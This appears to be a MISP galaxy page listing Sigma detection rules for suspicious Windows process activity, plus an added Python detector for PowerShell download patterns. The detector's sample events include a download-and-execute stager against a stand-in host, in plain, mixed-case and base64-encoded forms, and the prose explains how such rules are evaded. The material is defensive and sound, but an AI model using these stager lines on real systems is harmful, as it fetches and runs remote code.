Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

The tag is: misp-galaxy:sigma-rules="Powershell Defender Exclusion"

Powershell Defender Exclusion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10287. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://twitter.com/AdamTheAnalyst/status/1483497517119590403

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml

Arbitrary Binary Execution Using GUP Utility

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

The tag is: misp-galaxy:sigma-rules="Arbitrary Binary Execution Using GUP Utility"

Table 10288. Table References

Links

https://twitter.com/nas_bench/status/1535322445439180803

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml

Suspicious CodePage Switch Via CHCP

Detects a code page switch in command line or batch scripts to a rare language

The tag is: misp-galaxy:sigma-rules="Suspicious CodePage Switch Via CHCP"

Suspicious CodePage Switch Via CHCP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10289. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers

https://twitter.com/cglyer/status/1183756892952248325

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml

Kavremover Dropped Binary LOLBIN Usage

Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

The tag is: misp-galaxy:sigma-rules="Kavremover Dropped Binary LOLBIN Usage"

Kavremover Dropped Binary LOLBIN Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10290. Table References

Links

https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml

DllUnregisterServer Function Call Via Msiexec.EXE

Detects MsiExec loading a DLL and calling its DllUnregisterServer function

The tag is: misp-galaxy:sigma-rules="DllUnregisterServer Function Call Via Msiexec.EXE"

DllUnregisterServer Function Call Via Msiexec.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10291. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://lolbas-project.github.io/lolbas/Binaries/Msiexec/

https://twitter.com/st0pp3r/status/1583914515996897281

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml

Password Provided In Command Line Of Net.EXE

Detects when net.exe is called with a password in the command line.

The tag is: misp-galaxy:sigma-rules="Password Provided In Command Line Of Net.EXE"

Password Provided In Command Line Of Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 10292. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml

Recon Information for Export with Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Recon Information for Export with Command Prompt"

Recon Information for Export with Command Prompt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 10293. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml

Service Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on service registry keys. Often used by attackers to remove AV software services.

The tag is: misp-galaxy:sigma-rules="Service Registry Key Deleted Via Reg.EXE"

Service Registry Key Deleted Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10295. Table References

Links

https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml

Potentially Suspicious GoogleUpdate Child Process

Detects potentially suspicious child processes of "GoogleUpdate.exe"

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious GoogleUpdate Child Process"

Table 10296. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml

Shell32 DLL Execution in Suspicious Directory

Detects shell32.dll executing a DLL in a suspicious directory

The tag is: misp-galaxy:sigma-rules="Shell32 DLL Execution in Suspicious Directory"

Shell32 DLL Execution in Suspicious Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10297. Table References

Links

https://www.group-ib.com/resources/threat-research/red-curl-2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml

Suspicious PowerShell Download and Execute Pattern

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download and Execute Pattern"

Suspicious PowerShell Download and Execute Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10299. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml

Use of Setres.exe

Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path

The tag is: misp-galaxy:sigma-rules="Use of Setres.exe"

Use of Setres.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10300. Table References

Links

https://twitter.com/0gtweet/status/1583356502340870144

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)

https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html

https://lolbas-project.github.io/lolbas/Binaries/Setres/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml

Permission Check Via Accesschk.EXE

Detects usage of the "Accesschk" utility, an access and privilege audit tool from Sysinternals that is often abused by attackers to verify process privileges

The tag is: misp-galaxy:sigma-rules="Permission Check Via Accesschk.EXE"

Permission Check Via Accesschk.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 10301. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43

https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat

https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW

https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml

HackTool - SharpLDAPmonitor Execution

Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and modification of LDAP objects.

The tag is: misp-galaxy:sigma-rules="HackTool - SharpLDAPmonitor Execution"

Table 10302. Table References

Links

https://github.com/p0dalirius/LDAPmonitor

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml

DLL Sideloading by VMware Xfer Utility

Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL

The tag is: misp-galaxy:sigma-rules="DLL Sideloading by VMware Xfer Utility"

DLL Sideloading by VMware Xfer Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10303. Table References

Links

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml

HackTool - Covenant PowerShell Launcher

Detects suspicious command lines used in Covenant launchers

The tag is: misp-galaxy:sigma-rules="HackTool - Covenant PowerShell Launcher"

HackTool - Covenant PowerShell Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 10304. Table References

Links

https://posts.specterops.io/covenant-v0-5-eee0507b85ba

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_covenant.yml

Sideloading Link.EXE

Detects the execution of utilities often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name

The tag is: misp-galaxy:sigma-rules="Sideloading Link.EXE"

Sideloading Link.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10305. Table References

Links

https://twitter.com/0gtweet/status/1560732860935729152

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml

Suspicious Script Execution From Temp Folder

Detects suspicious script execution from a temporary folder

The tag is: misp-galaxy:sigma-rules="Suspicious Script Execution From Temp Folder"

Suspicious Script Execution From Temp Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10306. Table References

Links

https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml

Base64 Encoded PowerShell Command Detected

Detects usage of the "FromBase64String" function in the command line, which is used to decode a base64 encoded string

The tag is: misp-galaxy:sigma-rules="Base64 Encoded PowerShell Command Detected"

Base64 Encoded PowerShell Command Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10307. Table References

Links

https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml
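
Both this rule and "Suspicious PowerShell Download and Execute Pattern" above hinge on string matching against the command line, and in practice both are sidestepped by mixed case and by base64 layers: the download stager is simply hidden behind -EncodedCommand or behind a FromBase64String literal. The Python below is an added example written for this page, not code from SigmaHQ or MISP. It applies case-insensitive download indicators to a command line, then peels -EncodedCommand (UTF-16LE) and FromBase64String(...) literals and scans the decoded layers as well. The indicator regexes and the sample command lines are this example's own constructions and approximate the rules' intent rather than reproducing their exact selections; example.invalid is a reserved, non-resolving name.

```python
import base64
import binascii
import re

# Download/execute indicators, matched case-insensitively. These regexes are this
# example's own approximation of the rule's intent, not the rule's exact strings.
DOWNLOAD_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"new-object\s+(?:system\.)?net\.webclient",
        r"\.downloadstring\s*\(",
        r"\.downloadfile\s*\(",
        r"\binvoke-webrequest\b|\biwr\b",
        r"\|\s*iex\b|\biex\s*\(|\binvoke-expression\b",
    )
]
# [Convert]::FromBase64String('...') carrying an inline literal
FROMBASE64 = re.compile(r"FromBase64String\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.IGNORECASE)
# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -enc, ...)
ENC_SWITCH = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)


def _decode_candidates(literal: str) -> list:
    """Return plausible plaintext decodings of a base64 literal.

    -EncodedCommand payloads are UTF-16LE; FromBase64String payloads are usually
    UTF-8. Only printable, mostly-ASCII results are kept, so a UTF-8 payload decoded
    as UTF-16LE (which yields printable CJK noise) is discarded.
    """
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return []
    found = []
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if not text or not all(c.isprintable() or c in "\r\n\t" for c in text):
            continue
        if sum(ord(c) < 128 for c in text) / len(text) > 0.9:
            found.append(text)
    return found


def analyze(cmdline: str, depth: int = 0) -> dict:
    """Scan a command line plus every base64 layer it carries (at most 3 deep)."""
    result = {
        "download_pattern": any(p.search(cmdline) for p in DOWNLOAD_PATTERNS),
        "frombase64": FROMBASE64.search(cmdline) is not None,
        "decoded_layers": [],
    }
    if depth >= 3:
        return result
    literals = [m.group(1) for m in ENC_SWITCH.finditer(cmdline)]
    literals += [m.group(1) for m in FROMBASE64.finditer(cmdline)]
    for literal in literals:
        for text in _decode_candidates(literal):
            result["decoded_layers"].append(text)
            inner = analyze(text, depth + 1)
            result["download_pattern"] = result["download_pattern"] or inner["download_pattern"]
            result["frombase64"] = result["frombase64"] or inner["frombase64"]
            result["decoded_layers"].extend(inner["decoded_layers"])
    return result


def _ps_encode(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"

# Constructed sample command lines for this example (not real telemetry).
SAMPLE_EVENTS = {
    "plain": 'powershell.exe -nop -w hidden -c "' + _STAGER + '"',
    "mixed_case": "PoWeRsHeLl.exe -c \"iex (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('http://example.invalid/c')\"",
    "encoded": "powershell.exe -nop -w hidden -enc " + _ps_encode(_STAGER),
    "frombase64": (
        'powershell.exe -c "$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
        + base64.b64encode(_STAGER.encode()).decode("ascii")
        + "'));& ([scriptblock]::Create($s))\""
    ),
    "benign": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_EVENTS.items():
        r = analyze(cmd)
        print(f"{name:11} download={r['download_pattern']} frombase64={r['frombase64']} layers={len(r['decoded_layers'])}")
```

Run analyze() over the CommandLine field of process-creation events and attach decoded_layers to the alert: the decoded stager is what the analyst needs, and the plain "-enc" command line on its own says nothing about what was downloaded. The benign sample shows why the -e... alternation requires whitespace after the switch, so that -ExecutionPolicy is not treated as an encoded command.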

New Root Certificate Installed Via CertMgr.EXE

Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="New Root Certificate Installed Via CertMgr.EXE"

New Root Certificate Installed Via CertMgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10308. Table References

Links

https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml

Sysinternals PsService Execution

Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering

The tag is: misp-galaxy:sigma-rules="Sysinternals PsService Execution"

Sysinternals PsService Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10309. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/psservice

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml

New Firewall Rule Added Via Netsh.EXE

Detects the addition of a new rule to the Windows firewall via netsh

The tag is: misp-galaxy:sigma-rules="New Firewall Rule Added Via Netsh.EXE"

New Firewall Rule Added Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10310. Table References

Links

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml

Suspicious Download from Office Domain

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in emails or OneNote documents

The tag is: misp-galaxy:sigma-rules="Suspicious Download from Office Domain"

Suspicious Download from Office Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608" with estimative-language:likelihood-probability="almost-certain"

Table 10311. Table References

Links

https://twitter.com/mrd0x/status/1475085452784844803?s=12

https://twitter.com/an0n_r0/status/1474698356635193346?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml

PsExec/PAExec Escalation to LOCAL SYSTEM

Detects suspicious command-line flags used by PsExec and PAExec to escalate a command line to LOCAL SYSTEM rights

The tag is: misp-galaxy:sigma-rules="PsExec/PAExec Escalation to LOCAL SYSTEM"

PsExec/PAExec Escalation to LOCAL SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 10312. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.poweradmin.com/paexec/

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml

Run PowerShell Script from Redirected Input Stream

Detects PowerShell script execution via input stream redirect

The tag is: misp-galaxy:sigma-rules="Run PowerShell Script from Redirected Input Stream"

Run PowerShell Script from Redirected Input Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10313. Table References

Links

https://twitter.com/Moriarty_Meng/status/984380793383370752

https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml

Lolbin Defaultpack.exe Use As Proxy

Detects usage of the "defaultpack.exe" binary as a proxy to launch other programs

The tag is: misp-galaxy:sigma-rules="Lolbin Defaultpack.exe Use As Proxy"

Lolbin Defaultpack.exe Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10314. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/

https://www.echotrail.io/insights/search/defaultpack.exe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml

Suspicious UltraVNC Execution

Detects a suspicious UltraVNC command-line flag combination that indicates an automatic reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)

The tag is: misp-galaxy:sigma-rules="Suspicious UltraVNC Execution"

Suspicious UltraVNC Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

Table 10315. Table References

Links

https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html

https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml

PowerShell Script Run in AppData

Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder

The tag is: misp-galaxy:sigma-rules="PowerShell Script Run in AppData"

PowerShell Script Run in AppData has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10316. Table References

Links

https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03

https://twitter.com/JohnLaTwC/status/1082851155481288706

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml

Windows Internet Hosted WebDav Share Mount Via Net.EXE

Detects when an internet-hosted WebDAV share is mounted using the "net.exe" utility

The tag is: misp-galaxy:sigma-rules="Windows Internet Hosted WebDav Share Mount Via Net.EXE"

Windows Internet Hosted WebDav Share Mount Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10317. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml

Suspicious High IntegrityLevel Conhost Legacy Option

The ForceV1 option asks for information directly from kernel space. Conhost connects to the console application. A High IntegrityLevel means the process is running with elevated privileges, such as in an Administrator context.

The tag is: misp-galaxy:sigma-rules="Suspicious High IntegrityLevel Conhost Legacy Option"

Suspicious High IntegrityLevel Conhost Legacy Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10318. Table References

Links

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control

https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml

Suspect Svchost Activity

It is extremely abnormal for svchost.exe to spawn without any command-line arguments; this is normally observed when a malicious process spawns it and injects code into its memory space.

The tag is: misp-galaxy:sigma-rules="Suspect Svchost Activity"

Suspect Svchost Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10319. Table References

Links

https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml

HackTool - Jlaive In-Memory Assembly Execution

Detects the use of Jlaive to execute assemblies in a copied PowerShell

The tag is: misp-galaxy:sigma-rules="HackTool - Jlaive In-Memory Assembly Execution"

HackTool - Jlaive In-Memory Assembly Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10320. Table References

Links

https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive

https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml

Suspicious WmiPrvSE Child Process

Detects suspicious and uncommon child processes of WmiPrvSE

The tag is: misp-galaxy:sigma-rules="Suspicious WmiPrvSE Child Process"

Suspicious WmiPrvSE Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10321. Table References

Links

https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/

https://twitter.com/ForensicITGuy/status/1334734244120309760

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml

Enumeration for 3rd Party Creds From CLI

Detects processes that query, via the command line, known third-party registry keys that hold credentials

The tag is: misp-galaxy:sigma-rules="Enumeration for 3rd Party Creds From CLI"

Enumeration for 3rd Party Creds From CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 10322. Table References

Links

https://github.com/HyperSine/how-does-MobaXterm-encrypt-password

https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt

https://isc.sans.edu/diary/More+Data+Exfiltration/25698

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml

Application Terminated Via Wmic.EXE

Detects calls to the "terminate" function via wmic in order to kill an application

The tag is: misp-galaxy:sigma-rules="Application Terminated Via Wmic.EXE"

Application Terminated Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10323. Table References

Links

https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml

Suspicious Diantz Alternate Data Stream Execution

Detects use of diantz.exe to compress a target file into a CAB file stored in an Alternate Data Stream (ADS) of the target file.

The tag is: misp-galaxy:sigma-rules="Suspicious Diantz Alternate Data Stream Execution"

Suspicious Diantz Alternate Data Stream Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10324. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml

Use NTFS Short Name in Image

Detects use of Windows 8.3 short names in the image path, which could be used as a method to avoid image-based detection

The tag is: misp-galaxy:sigma-rules="Use NTFS Short Name in Image"

Use NTFS Short Name in Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10325. Table References

Links

https://twitter.com/jonasLyk/status/1555914501802921984

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml

HackTool - GMER Rootkit Detector and Remover Execution

Detects execution of the GMER tool based on image and hash fields.

The tag is: misp-galaxy:sigma-rules="HackTool - GMER Rootkit Detector and Remover Execution"

Table 10326. Table References

Links

http://www.gmer.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_gmer.yml

